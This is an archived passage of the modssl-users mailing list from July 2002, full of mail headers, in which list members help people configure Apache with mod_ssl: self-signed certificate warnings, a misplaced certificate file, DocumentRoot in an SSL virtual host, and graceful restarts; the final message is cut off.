	charset="iso-8859-1"
Subject: RE: http and https from same config
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Wed, 31 Jul 2002 15:53:09 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA924C@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: http and https from same config
Thread-Index: AcI4h0US2EHE/GziQPWW/JhIdFsnZAAEdlDw
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA26993
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>From: Svein E. Seldal [mailto:Svein.Seldal@solidas.com]
>
>Hi guys,
>
>I want to run a http server on port 81 which should only be 
>available to 
>the localnet, say 192.168.0.x/24 *and* on https with client 
>certificates 
>from the whole world. No passwords should be used in neither methodes.
>
>Now I've got SSL working with the certs, so that's not my 
>question, but 
>how do I configure the virtual host to enforce these access rights? 
>Today I've "hacked" the problem by running two separate (yet 
>identical) 
>virtual hosts. I want to run http(81) and https from the same virtual 
>host config. Is this possible?

I can't think how you would do this. IMHO, what you have already done (far from being a "hack") is the correct way to proceed - two virtualhosts with the same DocumentRoot (hence same content) but with different ports. The trouble is the "SSLEngine on" directive - this has only context in a VH, i.e. you can't make it conditional on an IP range, for instance.

Rgds,

Owen Boyle
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 15:55:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA27122; Wed, 31 Jul 2002 15:54:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.nelsonprinting.com id PAA27000; Wed, 31 Jul 2002 15:53:16 +0200 (MET DST)
Received: from AGAMEMNON.nelsonprinting.com (adsl-208-189-14-173.dsl.ltrkar.swbell.net [208.189.14.173])
	by mail.nelsonprinting.com (8.9.3/8.9.3) with ESMTP id DAA24483
	for ; Wed, 31 Jul 2002 03:16:53 -0500
Message-Id: <5.1.0.14.2.20020731085251.05425008@mail.nelsonprinting.com>
X-Sender: matt@mail.nelsonprinting.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Wed, 31 Jul 2002 08:55:04 -0500
To: modssl-users@modssl.org
From: Matt Nelson 
Subject: RE: ssl question
In-Reply-To: 
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Nelson 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

But I'm never even getting a response on the browser, httpd is never even 
starting due to this error.  I thought I had it corrected this morning, the 
log kept complaining about not finding the cert, I worked with that for a 
while, then came back to the same error.  Frustrating, but I'm not giving 
up just yet.   I'd like someone to take a look at my httpd.conf and tell me 
if I'm got something wrong there, or just what the problem can be.  I've 
tried to follow the docs as close as I can, but obviously I've missed 
something.

--
Matt

At 09:23 AM 7/31/2002 -0400, you wrote:

>No, because your browser does not have the signing authority in its list of
>trusted / root CAs. There are three options, but really only two are
>practical. The first would be to just import the certificate the first time
>you see this pop up and you can do that by clicking on "View certificate"
>when you get the pop up (I'm talking IE here). The second option would be to
>purchase and use a cert from a CA which is in your browsers list of
>trusted/root CA (someone like verisign). You can get the list by clicking on
>Tools->Internet options->The content tab->Certificates button->Trusted Root
>Certification Authorites tab. The third option would be to become a CA on
>that list by paying MS big bucks and setting your own company to do it (not
>what I would call viable :-).
>
>-Noah
>
> > -----Original Message-----
> > From: Matt Nelson [mailto:matt@nelsonprinting.com]
> > Sent: Wednesday, July 31, 2002 9:14 AM
> > To: modssl-users@modssl.org
> > Subject: RE: ssl question
> >
> > But I did a self-signed cert for testing purposes.  Shouldn't that work?
> >
> > --
> > Matt
> >
> >
> > At 04:34 PM 7/31/2002 +1000, you wrote:
> > >Mike,
> > >
> > >The reasoning behind that message is that you haven't purchased a
> > >certificate from a valid certificate store.  The bought my companies at
> > >verisign.com.
> > >
> > >If you are not releasing this web app to the public you could simply
> > >install the certificate and you shouldn't get the message again.
> > >
> > >Good luck,
> > >
> > >Vincent Montuoro Solution Engineer Request Level 12 461 Bourke Street
> > >Melbourne Vic 3000 Email:     vmontuoro@request.com.au Office:    +61 3
> > >8628 2764 Mobile:   0408 005 979
> > >
> > >
> > >-----Original Message-----
> > >From: Mike Boyer [mailto:bossdeez@hotmail.com]
> > >Sent: Wednesday, 31 July 2002 4:57 AM
> > >To: modssl-users@modssl.org
> > >Subject: ssl question
> > >
> > >I installed openSSL with mod_ssl, and I can access my site using
> > >https://blah.com  and I get a popup box telling me
> > about
> > >a security issue and if I want to accept this. When I have visited other
> > >sites that are secure, it dosent ask me to accept anything. In my
> > >certificate it says its not part of the CA trusted root stores. Any help
> > >would be appreciated.
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 15:58:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA27316; Wed, 31 Jul 2002 15:57:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id PAA27269; Wed, 31 Jul 2002 15:56:54 +0200 (MET DST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.9.3+Sun/8.9.3) with ESMTP id PAA17063
	for ; Wed, 31 Jul 2002 15:56:53 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id PAA00417
	for ; Wed, 31 Jul 2002 15:56:53 +0200 (MEST)
X-Authentication-Warning: gate0a.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: Error message help
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Wed, 31 Jul 2002 15:56:52 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA924D@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: Error message help
Thread-Index: AcI4SMfaJWx7C4ZBSZmMDoT09djGxgAUQUjQ
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA27307
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>From: Matt Nelson [mailto:matt@nelsonprinting.com]
>
>Now, the error I'm getting now  that I can't seem to find any 
>help on, in 
>the error_log is:
>
>OpenSSL: error:0D06B078:asn1 encoding routines:ASN1_get_object:header too long
>

Unusual.. Do you see anything in the browser? Also:

- What versions of apache, mod_ssl, openssl?
- Static or DSO?
- What browser?

Rgds,
owen Boyle
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 16:37:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA00302; Wed, 31 Jul 2002 16:36:44 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.nelsonprinting.com id QAA00168; Wed, 31 Jul 2002 16:34:27 +0200 (MET DST)
Received: from AGAMEMNON.nelsonprinting.com (adsl-208-189-14-173.dsl.ltrkar.swbell.net [208.189.14.173])
	by mail.nelsonprinting.com (8.9.3/8.9.3) with ESMTP id DAA24688
	for ; Wed, 31 Jul 2002 03:58:03 -0500
Message-Id: <5.1.0.14.2.20020731090624.058e9ec0@mail.nelsonprinting.com>
X-Sender: matt@mail.nelsonprinting.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Wed, 31 Jul 2002 09:36:14 -0500
To: modssl-users@modssl.org
From: Matt Nelson 
Subject: RE: Error message help
In-Reply-To: <14D1193E30E0894D8A773957C0AEE24AAA924D@SOMEXEVS001.ex.orde
 rsx.org>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Nelson 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

At 03:56 PM 7/31/2002 +0200, you wrote:
> >From: Matt Nelson [mailto:matt@nelsonprinting.com]
> >
> >Now, the error I'm getting now  that I can't seem to find any
> >help on, in
> >the error_log is:
> >
> >OpenSSL: error:0D06B078:asn1 encoding routines:ASN1_get_object:header 
> too long
> >
>
>Unusual.. Do you see anything in the browser? Also:
>
>- What versions of apache, mod_ssl, openssl?


Apache 1.3.22
OpenSSL 0.9.6
mod_ssl 1.4



>- Static or DSO?


I'll be honest and say I don't quite understand that question.  I'm way 
more new at this what I wished.  I could probably answer that question, if 
asked in different terms.

>- What browser?

IE, Mozilla, you name it.

>Rgds,
>owen Boyle
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 17:03:57 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA02360; Wed, 31 Jul 2002 17:01:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.nelsonprinting.com id QAA02139; Wed, 31 Jul 2002 16:59:30 +0200 (MET DST)
Received: from AGAMEMNON.nelsonprinting.com (adsl-208-189-14-173.dsl.ltrkar.swbell.net [208.189.14.173])
	by mail.nelsonprinting.com (8.9.3/8.9.3) with ESMTP id EAA24818
	for ; Wed, 31 Jul 2002 04:23:07 -0500
Message-Id: <5.1.0.14.2.20020731095931.0440edc0@mail.nelsonprinting.com>
X-Sender: matt@mail.nelsonprinting.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Wed, 31 Jul 2002 10:01:18 -0500
To: modssl-users@modssl.org
From: Matt Nelson 
Subject: RE: Error message help
In-Reply-To: <5.1.0.14.2.20020731090624.058e9ec0@mail.nelsonprinting.com
 >
References: <14D1193E30E0894D8A773957C0AEE24AAA924D@SOMEXEVS001.ex.orde rsx.org>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Nelson 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Well I may have figured this out, https is now running, cert was in the 
wrong place, but https returns the default web page for the apache 
installation, instead of the real site, which does come up with just 
http.  I think I can figure that out, but if anyone has pointer 
thanks,  and thanks for suffering my dumb questions.

--
Matt


At 09:36 AM 7/31/2002 -0500, you wrote:
>At 03:56 PM 7/31/2002 +0200, you wrote:
>> >From: Matt Nelson [mailto:matt@nelsonprinting.com]
>> >
>> >Now, the error I'm getting now  that I can't seem to find any
>> >help on, in
>> >the error_log is:
>> >
>> >OpenSSL: error:0D06B078:asn1 encoding routines:ASN1_get_object:header 
>> too long
>> >
>>
>>Unusual.. Do you see anything in the browser? Also:
>>
>>- What versions of apache, mod_ssl, openssl?
>
>
>Apache 1.3.22
>OpenSSL 0.9.6
>mod_ssl 1.4
>
>
>
>>- Static or DSO?
>
>
>I'll be honest and say I don't quite understand that question.  I'm way 
>more new at this what I wished.  I could probably answer that question, if 
>asked in different terms.
>
>>- What browser?
>
>IE, Mozilla, you name it.
>
>>Rgds,
>>owen Boyle
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 17:47:34 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA05276; Wed, 31 Jul 2002 17:46:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from seraph2.grc.nasa.gov id RAA05198; Wed, 31 Jul 2002 17:45:33 +0200 (MET DST)
Received: from lombok-fi.lerc.nasa.gov (lombok-fi.lerc.nasa.gov [139.88.112.33])
	by seraph2.grc.nasa.gov (Postfix) with ESMTP id 38E80C69A9
	for ; Wed, 31 Jul 2002 11:45:26 -0400 (EDT)
Received: from salderman.lerc.nasa.gov (salderman.lerc.nasa.gov [139.88.188.22])
	by lombok-fi.lerc.nasa.gov (NASA GRC 8.12.3/8.12.3) with ESMTP id g6VFjPBg024048
	for ; Wed, 31 Jul 2002 11:45:25 -0400 (EDT)
Received: (smalder@localhost) by salderman.lerc.nasa.gov (NASA LeRC 8.7.4.1/2.01-local)
        id LAA07518; Wed, 31 Jul 2002 11:46:21 -0400
X-Authentication-Warning: salderman.lerc.nasa.gov: smalder set sender to sean.m.alderman@grc.nasa.gov using -f
Subject: RE: apachectl restart problem...
From: Sean M Alderman 
To: modssl-users@modssl.org
In-Reply-To: 
	<14D1193E30E0894D8A773957C0AEE24AAA924B@SOMEXEVS001.ex.ordersx.org>
References: 
	<14D1193E30E0894D8A773957C0AEE24AAA924B@SOMEXEVS001.ex.ordersx.org>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 
Date: 31 Jul 2002 11:46:21 -0400
Message-Id: <1028130381.17722.677.camel@salderman.lerc.nasa.gov>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean M Alderman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I thought it might be something like that, but typically when I've run
into this, I've made a change to a http virtual host, and all the other
virtual hosts ssl or not, are then not accessible.  Maybe apache needs a
better way to reload configs for virtual hosts (such that it doesn't
bother anything else)...but that's not a topic for this list.  :) 
Thanks for the response.

On Wed, 2002-07-31 at 09:48, Boyle Owen wrote:
> >From: Sean M Alderman [mailto:sean.m.alderman@grc.nasa.gov]
> >
> >Greetings all,
> >  I'm curious if anyone has come across issues with starting apache
> >using -
> ># $APACHE_HOME/bin/apachectl startssl
> >and then having apache hang when issuing this -
> ># $APACHE_HOME/bin/apachectl restart
> >
> >I'm running 1.3.26 with the latest mod_ssl on Solaris 8.  I don't get
> >any error messages in the logs, and apachectl says that it 
> >restarts just
> >fine, but when you point a browser back to the server it does not
> >respond.  I can fix it with an apachectl stop;apachectl startssl, but
> >I'm just curious about not being able to do the restart.
> 
> Restart sends a HUP to apache. I've found that this is sometimes insufficiently forceful to make apache reload certain SSL parameters (e.g. if you change the certificate). However, it should be sufficient for non-SSL edits.
> 
> Rgds,
> Owen Boyle
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 17:57:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA06117; Wed, 31 Jul 2002 17:56:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id RAA06048; Wed, 31 Jul 2002 17:55:25 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id H04EVW00.17I for ; Wed, 31 Jul 2002
          16:55:09 +0100 
Message-ID: <3D48085B.3080407@itaction.co.uk>
Date: Wed, 31 Jul 2002 16:55:07 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: apachectl restart problem...
References: <14D1193E30E0894D8A773957C0AEE24AAA924B@SOMEXEVS001.ex.ordersx.org> <1028130381.17722.677.camel@salderman.lerc.nasa.gov>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

reloads dont work if your keys are encrypted - is this the case here?

i have happliy sent a sig USR1 to an ssl apache setup each night for two 
years - and never a problem - only goes awry if a cert or key changes.

Sean M Alderman wrote:

>I thought it might be something like that, but typically when I've run
>into this, I've made a change to a http virtual host, and all the other
>virtual hosts ssl or not, are then not accessible.  Maybe apache needs a
>better way to reload configs for virtual hosts (such that it doesn't
>bother anything else)...but that's not a topic for this list.  :) 
>Thanks for the response.
>
>On Wed, 2002-07-31 at 09:48, Boyle Owen wrote:
>  
>
>>>From: Sean M Alderman [mailto:sean.m.alderman@grc.nasa.gov]
>>>
>>>Greetings all,
>>> I'm curious if anyone has come across issues with starting apache
>>>using -
>>># $APACHE_HOME/bin/apachectl startssl
>>>and then having apache hang when issuing this -
>>># $APACHE_HOME/bin/apachectl restart
>>>
>>>I'm running 1.3.26 with the latest mod_ssl on Solaris 8.  I don't get
>>>any error messages in the logs, and apachectl says that it 
>>>restarts just
>>>fine, but when you point a browser back to the server it does not
>>>respond.  I can fix it with an apachectl stop;apachectl startssl, but
>>>I'm just curious about not being able to do the restart.
>>>      
>>>
>>Restart sends a HUP to apache. I've found that this is sometimes insufficiently forceful to make apache reload certain SSL parameters (e.g. if you change the certificate). However, it should be sufficient for non-SSL edits.
>>
>>Rgds,
>>Owen Boyle
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>>    
>>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 18:04:52 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA06699; Wed, 31 Jul 2002 18:03:43 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id SAA06631; Wed, 31 Jul 2002 18:02:21 +0200 (MET DST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.9.3+Sun/8.9.3) with ESMTP id SAA27289
	for ; Wed, 31 Jul 2002 18:02:20 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id SAA06795
	for ; Wed, 31 Jul 2002 18:02:19 +0200 (MEST)
X-Authentication-Warning: gate0a.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: Error message help
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Wed, 31 Jul 2002 18:02:19 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA8C04@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: Error message help
Thread-Index: AcI4o5zUZd13a94WQRKAw0Zussn7JQABlTAQ
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA06686
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

See comments,

Rgds,

Owen Boyle

>-----Original Message-----
>From: Matt Nelson [mailto:matt@nelsonprinting.com]
>Sent: Mittwoch, 31. Juli 2002 17:01
>To: modssl-users@modssl.org
>Subject: RE: Error message help
>
>
>Well I may have figured this out, https is now running, cert 
>was in the wrong place, 

..or your SSLCertificateFile directive was pointing to the wrong place :-)

> ...but https returns the default web page for the apache 
>installation, instead of the real site, which does come up with just 
>http.  I think I can figure that out, but if anyone has pointer 
>thanks,  and thanks for suffering my dumb questions.

Check out your DocumentRoot directive in the SSL virtual host - there should only be one. If there is more than one, apache will use the last one... It is this directive which tells apache where to fetch the content.

>
>--
>Matt
>
>
>At 09:36 AM 7/31/2002 -0500, you wrote:
>>At 03:56 PM 7/31/2002 +0200, you wrote:
>>> >From: Matt Nelson [mailto:matt@nelsonprinting.com]
>>> >
>>> >Now, the error I'm getting now  that I can't seem to find any
>>> >help on, in
>>> >the error_log is:
>>> >
>>> >OpenSSL: error:0D06B078:asn1 encoding 
>routines:ASN1_get_object:header 
>>> too long
>>> >
>>>
>>>Unusual.. Do you see anything in the browser? Also:
>>>
>>>- What versions of apache, mod_ssl, openssl?
>>
>>
>>Apache 1.3.22
>>OpenSSL 0.9.6
>>mod_ssl 1.4

Um... If I were you, I'd get apache 1.3.26, OpenSSL 0.9.6e and mod_ssl 2.8.10. That's teh latest mix, also pay attention to the security advisory that was posted to the list today. 

>>
>>>- Static or DSO?

When you compiled apache, did you statically compile in mod_ssl (i.e. --enable-module=ssl) so that the mod_ssl binary gets munged in with the apache binary to produce a big binary *or* did you compile mod_ssl as a shared object which would be loaded dynamically at runtime (DSO = Dynamic Shared Object), i.e. --enable-shared=ssl? Usually, it doesn't make much difference when they're working, but since yours was not working, I thought I'd ask.

>>
>>
>>I'll be honest and say I don't quite understand that 
>question.  I'm way 
>>more new at this what I wished.  I could probably answer that 
>question, if 
>>asked in different terms.
>>
>>>- What browser?
>>
>>IE, Mozilla, you name it.

Just in case it was a funny browser - SSL is as much to do with the client as it is to do with the server so it is essential to verify any problems with several browsers. But you've already done that.

>>
>>>Rgds,
>>>owen Boyle
>>>_____________________________________________________________
>_________
>>>Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 21:54:49 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA21355; Wed, 31 Jul 2002 21:52:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.nelsonprinting.com id VAA21286; Wed, 31 Jul 2002 21:50:40 +0200 (MET DST)
Received: from AGAMEMNON.nelsonprinting.com (adsl-208-189-14-173.dsl.ltrkar.swbell.net [208.189.14.173])
	by mail.nelsonprinting.com (8.9.3/8.9.3) with ESMTP id JAA26197
	for ; Wed, 31 Jul 2002 09:14:10 -0500
Message-Id: <5.1.0.14.2.20020731144753.04a2b008@mail.nelsonprinting.com>
X-Sender: matt@mail.nelsonprinting.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Wed, 31 Jul 2002 14:52:18 -0500
To: modssl-users@modssl.org
From: Matt Nelson 
Subject: RE: Error message help
In-Reply-To: <14D1193E30E0894D8A773957C0AEE24AAA8C04@SOMEXEVS001.ex.orde
 rsx.org>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Nelson 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

At 06:02 PM 7/31/2002 +0200, you wrote:
>See comments,

Ditto,

>Rgds,
>
>Owen Boyle
>
> >-----Original Message-----
> >From: Matt Nelson [mailto:matt@nelsonprinting.com]
> >Sent: Mittwoch, 31. Juli 2002 17:01
> >To: modssl-users@modssl.org
> >Subject: RE: Error message help
> >
> >
> >Well I may have figured this out, https is now running, cert
> >was in the wrong place,
>
>..or your SSLCertificateFile directive was pointing to the wrong place :-)

Yup, but dang I was confused on where it went.  Everything I've read said 
put it somewhere different.  Error logs are you friends.


> > ...but https returns the default web page for the apache
> >installation, instead of the real site, which does come up with just
> >http.  I think I can figure that out, but if anyone has pointer
> >thanks,  and thanks for suffering my dumb questions.
>
>Check out your DocumentRoot directive in the SSL virtual host - there 
>should only be one. If there is more than one, apache will use the last 
>one... It is this directive which tells apache where to fetch the content.

Yeah I found that right after I wrote that.

> >
> >--
> >Matt
> >
> >
> >At 09:36 AM 7/31/2002 -0500, you wrote:
> >>At 03:56 PM 7/31/2002 +0200, you wrote:
> >>> >From: Matt Nelson [mailto:matt@nelsonprinting.com]
> >>> >
> >>> >Now, the error I'm getting now  that I can't seem to find any
> >>> >help on, in
> >>> >the error_log is:
> >>> >
> >>> >OpenSSL: error:0D06B078:asn1 encoding
> >routines:ASN1_get_object:header
> >>> too long
> >>> >
> >>>
> >>>Unusual.. Do you see anything in the browser? Also:
> >>>
> >>>- What versions of apache, mod_ssl, openssl?
> >>
> >>
> >>Apache 1.3.22
> >>OpenSSL 0.9.6
> >>mod_ssl 1.4
>
>Um... If I were you, I'd get apache 1.3.26, OpenSSL 0.9.6e and mod_ssl 
>2.8.10. That's teh latest mix, also pay attention to the security advisory 
>that was posted to the list today.

I'll do that.


> >>
> >>>- Static or DSO?
>
>When you compiled apache, did you statically compile in mod_ssl (i.e. 
>--enable-module=ssl) so that the mod_ssl binary gets munged in with the 
>apache binary to produce a big binary *or* did you compile mod_ssl as a 
>shared object which would be loaded dynamically at runtime (DSO = Dynamic 
>Shared Object), i.e. --enable-shared=ssl? Usually, it doesn't make much 
>difference when they're working, but since yours was not working, I 
>thought I'd ask.

I didn't compile, I used everything stock from the Caldera 3.11 server 
install. A bad idea now I know, if I'd done it on my own or recompiled, I'd 
know which it was, among other things.

> >>
> >>
> >>I'll be honest and say I don't quite understand that
> >question.  I'm way
> >>more new at this what I wished.  I could probably answer that
> >question, if
> >>asked in different terms.
> >>
> >>>- What browser?
> >>
> >>IE, Mozilla, you name it.
>
>Just in case it was a funny browser - SSL is as much to do with the client 
>as it is to do with the server so it is essential to verify any problems 
>with several browsers. But you've already done that.

Yeah...  See I do try, I hate being a clueless newbie, or at least acting 
like one.  I always try to cover the bases myself, so I don't get RTFM 
responses.  I'm sure I'll have some other questions, though, and soon.

Thanks much

--
Matt

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 22:36:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA24294; Wed, 31 Jul 2002 22:35:47 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.sdsu.edu id WAA24171; Wed, 31 Jul 2002 22:33:07 +0200 (MET DST)
Received: from localhost (dlowenst@localhost)
	by mail.sdsu.edu (8.11.4/8.11.4) with ESMTP id g6VKX1H21004
	for ; Wed, 31 Jul 2002 13:33:01 -0700 (PDT)
Date: Wed, 31 Jul 2002 13:33:01 -0700 (PDT)
From: David Lowenstein 
To: modssl-users@modssl.org
Subject: MM doesn't work now with 0.9.6e
In-Reply-To: <5.1.0.14.2.20020731144753.04a2b008@mail.nelsonprinting.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Lowenstein 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I just installed the newest version of openssl and recompiled mm, mod_ssl,
mod_perl, and apache. Now when I start apache I get an error from my
